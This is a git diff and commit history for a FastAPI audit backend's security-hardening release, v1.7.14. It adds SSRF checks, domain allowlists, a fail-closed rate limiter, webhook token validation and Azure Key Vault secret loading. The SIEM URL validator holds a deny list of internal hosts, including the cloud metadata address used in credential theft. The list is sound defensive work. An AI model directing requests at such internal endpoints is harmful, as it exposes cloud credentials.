    return Response(content=prometheus_metrics(), media_type="text/plain")


@app.get("/api/version")
 async def version():
-    import os
-
    return {"version": os.environ.get("VERSION", "unknown")}


@@ -177,7 +236,13 @@ async def version():
 async def generic_exception_handler(request: Request, exc: Exception):
    """Return generic error messages for unhandled exceptions to avoid info leakage."""
    if isinstance(exc, HTTPException):
-        raise exc
+        from fastapi.responses import JSONResponse
+
+        return JSONResponse(
+            status_code=exc.status_code,
+            content={"detail": exc.detail},
+            headers=getattr(exc, "headers", None) or {},
+        )
    logger.error("Unhandled exception", path=request.url.path, error=str(exc))
    return Response(
        content='{"detail":"Internal server error"}',
@@ -206,6 +271,19 @@ async def start_periodic_fetch():
    from rules import seed_default_rules

    seed_default_rules()
+    logger.info(
+        "AOC startup",
+        version=os.environ.get("VERSION", "unknown"),
+        auth_enabled=AUTH_ENABLED,
+        ai_enabled=AI_FEATURES_ENABLED,
+    )
+    # Warn when auth is enabled but no role/group restrictions are configured
+    if AUTH_ENABLED and not AUTH_ALLOWED_ROLES and not AUTH_ALLOWED_GROUPS:
+        logger.warning(
+            "AUTH_ENABLED is true but no AUTH_ALLOWED_ROLES or AUTH_ALLOWED_GROUPS are configured. "
+            "Any Entra user in the tenant can authenticate and access AOC. "
+            "Set AUTH_ALLOWED_ROLES or AUTH_ALLOWED_GROUPS to restrict access."
+        )
    if ENABLE_PERIODIC_FETCH:
        app.state.fetch_task = asyncio.create_task(_periodic_fetch())

--- a/backend/rate_limiter.py
+++ b/backend/rate_limiter.py
@@ -79,4 +79,5 @@ async def check_rate_limit(request: Request):
    except RateLimitExceeded:
        raise
    except Exception as exc:
-        logger.warning("Rate limiter Redis error; allowing request", error=str(exc))
+        logger.warning("Rate limiter Redis error; failing closed", error=str(exc))
+        raise RateLimitExceeded(retry_after=60) from None
--- a/backend/requirements.txt
+++ b/backend/requirements.txt
@@ -16,3 +16,8 @@ gunicorn
 mcp
 redis
 arq
+
+# Optional: Azure Key Vault integration for secrets storage
+# Uncomment if using AZURE_KEY_VAULT_NAME
+# azure-identity
+# azure-keyvault-secrets
--- a/backend/routes/ask.py
+++ b/backend/routes/ask.py
@@ -7,6 +7,7 @@ import httpx
 import structlog
 from auth import require_auth, user_can_access_privacy_services
 from config import (
+    LLM_ALLOWED_DOMAINS,
    LLM_API_KEY,
    LLM_API_VERSION,
    LLM_BASE_URL,
@@ -398,7 +399,7 @@ def _format_events_for_llm(


 def _validate_llm_url(url: str):
-    """Prevent SSRF by rejecting internal/reserved addresses."""
+    """Prevent SSRF by rejecting internal/reserved addresses and enforcing domain allowlist."""
    from urllib.parse import urlparse

    parsed = urlparse(url)
@@ -420,6 +421,12 @@ def _validate_llm_url(url: str):
    except ValueError:
        pass  # hostname is not an IP, which is fine

+    # Enforce domain allowlist if configured
+    if LLM_ALLOWED_DOMAINS:
+        allowed = any(hostname == d or (d.startswith("*.") and hostname.endswith(d[1:])) for d in LLM_ALLOWED_DOMAINS)
+        if not allowed:
+            raise RuntimeError(f"LLM_BASE_URL domain '{hostname}' is not in LLM_ALLOWED_DOMAINS")
+

 def _build_chat_url(base_url: str, api_version: str) -> str:
    base = base_url.rstrip("/")
--- a/backend/routes/config.py
+++ b/backend/routes/config.py
@@ -1,3 +1,4 @@
+import structlog
 from config import (
    AI_FEATURES_ENABLED,
    AUTH_CLIENT_ID,
@@ -9,14 +10,16 @@ from config import (
 from fastapi import APIRouter

 router = APIRouter()
+logger = structlog.get_logger("aoc.config")


@router.get("/config/auth")
 def auth_config():
+    logger.debug("Auth config requested", auth_enabled=AUTH_ENABLED)
    return {
        "auth_enabled": AUTH_ENABLED,
-        "tenant_id": AUTH_TENANT_ID,
-        "client_id": AUTH_CLIENT_ID,
+        "tenant_id": AUTH_TENANT_ID if AUTH_ENABLED else "",
+        "client_id": AUTH_CLIENT_ID if AUTH_ENABLED else "",
        "scope": AUTH_SCOPE,
        "redirect_uri": None,  # frontend uses window.location.origin by default
    }
--- a/backend/routes/webhooks.py
+++ b/backend/routes/webhooks.py
@@ -17,7 +17,15 @@ async def graph_webhook(request: Request):
    if validation_token:
        # Microsoft sends validationToken as a query param during subscription creation.
        # Echo it back as plain text to prove endpoint ownership.
-        return Response(content=validation_token, media_type="text/plain")
+        # Validate to prevent content injection if endpoint is hit directly.
+        if len(validation_token) > 1024 or not validation_token.isascii():
+            logger.warning("Invalid validationToken rejected", length=len(validation_token))
+            return Response(status_code=400)
+        return Response(
+            content=validation_token,
+            media_type="text/plain",
+            headers={"X-Content-Type-Options": "nosniff"},
+        )

    try:
        body = await request.json()
--- a/backend/secrets_manager.py
+++ b/backend/secrets_manager.py
@@ -0,0 +1,76 @@
+"""Optional Azure Key Vault integration for secrets storage.
+
+If AZURE_KEY_VAULT_NAME is configured, sensitive secrets are fetched from
+Azure Key Vault at startup and injected into the environment so that
+pydantic-settings can read them. Falls back to .env / environment variables
+when Key Vault is not configured.
+
+Secret naming convention in Key Vault:
+    aoc-client-secret        → CLIENT_SECRET
+    aoc-llm-api-key          → LLM_API_KEY
+    aoc-mongo-uri            → MONGO_URI
+    aoc-webhook-client-secret → WEBHOOK_CLIENT_SECRET
+"""
+
+import os
+
+import structlog
+
+logger = structlog.get_logger("aoc.secrets")
+
+_KEY_VAULT_SECRET_MAP = {
+    "aoc-client-secret": "CLIENT_SECRET",
+    "aoc-llm-api-key": "LLM_API_KEY",
+    "aoc-mongo-uri": "MONGO_URI",
+    "aoc-webhook-client-secret": "WEBHOOK_CLIENT_SECRET",
+}
+
+
+def _load_from_key_vault(vault_name: str) -> dict[str, str]:
+    """Fetch secrets from Azure Key Vault and return as {env_name: value}."""
+    try:
+        from azure.identity import DefaultAzureCredential
+        from azure.keyvault.secrets import SecretClient
+    except ImportError as exc:
+        raise RuntimeError(
+            "Azure Key Vault libraries are not installed. Run: pip install azure-identity azure-keyvault-secrets"
+        ) from exc
+
+    vault_url = f"https://{vault_name}.vault.azure.net/"
+    credential = DefaultAzureCredential()
+    client = SecretClient(vault_url=vault_url, credential=credential)
+
+    loaded = {}
+    for kv_name, env_name in _KEY_VAULT_SECRET_MAP.items():
+        try:
+            secret = client.get_secret(kv_name)
+            if secret.value:
+                loaded[env_name] = secret.value
+                logger.info("Loaded secret from Key Vault", secret_name=kv_name)
+        except Exception as exc:
+            logger.warning(
+                "Failed to load secret from Key Vault",
+                secret_name=kv_name,
+                error=str(exc),
+            )
+    return loaded
+
+
+def load_key_vault_secrets(vault_name: str | None = None):
+    """Load secrets from Azure Key Vault into os.environ if configured.
+
+    This should be called BEFORE pydantic-settings parses configuration.
+    """
+    vault = vault_name or os.environ.get("AZURE_KEY_VAULT_NAME", "")
+    if not vault:
+        return
+
+    logger.info("Loading secrets from Azure Key Vault", vault_name=vault)
+    secrets = _load_from_key_vault(vault)
+    for env_name, value in secrets.items():
+        os.environ[env_name] = value
+    logger.info(
+        "Key Vault secrets loaded",
+        count=len(secrets),
+        keys=list(secrets.keys()),
+    )
--- a/backend/siem.py
+++ b/backend/siem.py
@@ -1,15 +1,43 @@
+import ipaddress
+
 import requests
 import structlog
-from config import SIEM_ENABLED, SIEM_WEBHOOK_URL
+from config import SIEM_ALLOWED_DOMAINS, SIEM_ENABLED, SIEM_WEBHOOK_URL

 logger = structlog.get_logger("aoc.siem")


+def _validate_siem_url(url: str):
+    """Prevent SSRF by rejecting internal/reserved addresses and enforcing domain allowlist."""
+    from urllib.parse import urlparse
+
+    parsed = urlparse(url)
+    if parsed.scheme != "https":
+        raise RuntimeError("SIEM_WEBHOOK_URL must use HTTPS")
+    hostname = (parsed.hostname or "").lower()
+    if not hostname:
+        raise RuntimeError("SIEM_WEBHOOK_URL must have a valid hostname")
+    blocked = {"localhost", "127.0.0.1", "0.0.0.0", "::1", "169.254.169.254"}
+    if hostname in blocked:
+        raise RuntimeError(f"SIEM_WEBHOOK_URL hostname '{hostname}' is not allowed")
+    try:
+        ip = ipaddress.ip_address(hostname)
+        if ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved:
+            raise RuntimeError(f"SIEM_WEBHOOK_URL IP '{hostname}' is not allowed")
+    except ValueError:
+        pass
+    if SIEM_ALLOWED_DOMAINS:
+        allowed = any(hostname == d or (d.startswith("*.") and hostname.endswith(d[1:])) for d in SIEM_ALLOWED_DOMAINS)
+        if not allowed:
+            raise RuntimeError(f"SIEM_WEBHOOK_URL domain '{hostname}' is not in SIEM_ALLOWED_DOMAINS")
+
+
 def forward_event(event: dict):
    """Forward a normalized event to the configured SIEM webhook."""
    if not SIEM_ENABLED or not SIEM_WEBHOOK_URL:
        return
    try:
+        _validate_siem_url(SIEM_WEBHOOK_URL)
        res = requests.post(SIEM_WEBHOOK_URL, json=event, timeout=10)
        res.raise_for_status()
        logger.debug("Event forwarded to SIEM", event_id=event.get("id"))
--- a/backend/tests/conftest.py
+++ b/backend/tests/conftest.py
@@ -51,18 +51,32 @@ def client(mock_events_collection, mock_watermarks_collection, monkeypatch):

    # Mock Redis so tests don't require a running Redis server
    class FakeRedis:
+        _store = {}
+
        async def get(self, key):
-            return None
+            return self._store.get(key)

        async def setex(self, key, ttl, value):
+            self._store[key] = value
+
+        async def incr(self, key):
+            self._store[key] = self._store.get(key, 0) + 1
+            return self._store[key]
+
+        async def expire(self, key, ttl):
            pass

    async def fake_get_arq_pool():
        return FakeRedis()

+    async def fake_get_redis():
+        return FakeRedis()
+
    monkeypatch.setattr("redis_client.get_arq_pool", fake_get_arq_pool)
+    monkeypatch.setattr("redis_client.get_redis", fake_get_redis)
    monkeypatch.setattr("routes.ask.get_arq_pool", fake_get_arq_pool)
-    monkeypatch.setattr("routes.jobs.get_redis", fake_get_arq_pool)
+    monkeypatch.setattr("routes.jobs.get_redis", fake_get_redis)
+    monkeypatch.setattr("rate_limiter.get_redis", fake_get_redis)

    from main import app

--- a/backend/tests/test_api.py
+++ b/backend/tests/test_api.py
@@ -268,7 +268,7 @@ def test_health(client):


 def test_metrics(client):
-    response = client.get("/metrics")
+    response = client.get("/metrics", headers={"X-Forwarded-For": "127.0.0.1"})
    assert response.status_code == 200
    assert "aoc_request_duration_seconds" in response.text
Author	SHA1	Message	Date
Tomas Kracmar	fe95dfcfce	docs: update AGENTS.md, README.md, DEPLOY.md, ROADMAP.md for v1.7.14 security features All checks were successful Release / build-and-push (push) Successful in 21s Details CI / lint-and-test (push) Successful in 25s Details	2026-04-27 16:52:35 +02:00
Tomas Kracmar	8d951fc335	v1.7.14: LLM/SIEM domain allowlists, SRI hashes, auth misconfig warning, Azure Key Vault integration All checks were successful CI / lint-and-test (push) Successful in 22s Details Release / build-and-push (push) Successful in 1m7s Details	2026-04-27 16:45:06 +02:00
Tomas Kracmar	35eca65234	v1.7.13: switch Alpine.js to CSP build, remove unsafe-eval from CSP All checks were successful Release / build-and-push (push) Successful in 40s Details CI / lint-and-test (push) Successful in 33s Details	2026-04-27 16:08:34 +02:00
Tomas Kracmar	07a841615b	v1.7.12: security hardening — CORS fix, security headers, fail-closed rate limiter, OpenAPI docs disabled by default, config auth privacy, webhook validation All checks were successful Release / build-and-push (push) Successful in 44s Details CI / lint-and-test (push) Successful in 22s Details	2026-04-27 14:19:28 +02:00
Tomas Kracmar	c086fa4260	hotfix(v1.7.11): add unsafe-eval to CSP for Alpine.js All checks were successful CI / lint-and-test (push) Successful in 1m26s Details Release / build-and-push (push) Successful in 3m1s Details	2026-04-27 10:39:33 +02:00
Tomas Kracmar	be700fefc3	hotfix(v1.7.10): add font-src to CSP for data URI fonts All checks were successful CI / lint-and-test (push) Successful in 1m29s Details Release / build-and-push (push) Successful in 2m53s Details	2026-04-27 10:32:35 +02:00
Tomas Kracmar	e2cea50d87	hotfix(v1.7.9): auth diagnostics and rate-limit exemptions All checks were successful CI / lint-and-test (push) Successful in 2m30s Details Release / build-and-push (push) Successful in 4m46s Details - Exempt /api/config/auth, /api/config/features, /health, /metrics from rate limiting - Fix generic exception handler to return proper JSON for HTTPException instead of re-raising - Add startup log with auth_enabled and version - Add frontend console logging for auth config fetch errors - Show 'Auth: OFF' or 'Auth: misconfigured' on auth button instead of empty text - Add backend debug logging to /api/config/auth endpoint	2026-04-27 10:09:44 +02:00
Tomas Kracmar	7fe53f882a	hotfix(v1.7.8): restore CORS wildcard and fix CSP for MSAL auth All checks were successful CI / lint-and-test (push) Successful in 51s Details Release / build-and-push (push) Successful in 2m4s Details - Revert automatic CORS wildcard stripping that broke production deployments with CORS_ORIGINS=* (now logs a warning but preserves the config) - Expand CSP headers to allow MSAL auth flows: - connect-src: login.microsoftonline.com - frame-src: login.microsoftonline.com - form-action: login.microsoftonline.com	2026-04-27 09:41:28 +02:00
@@ -1 +1 @@
 .7.7
 .7.14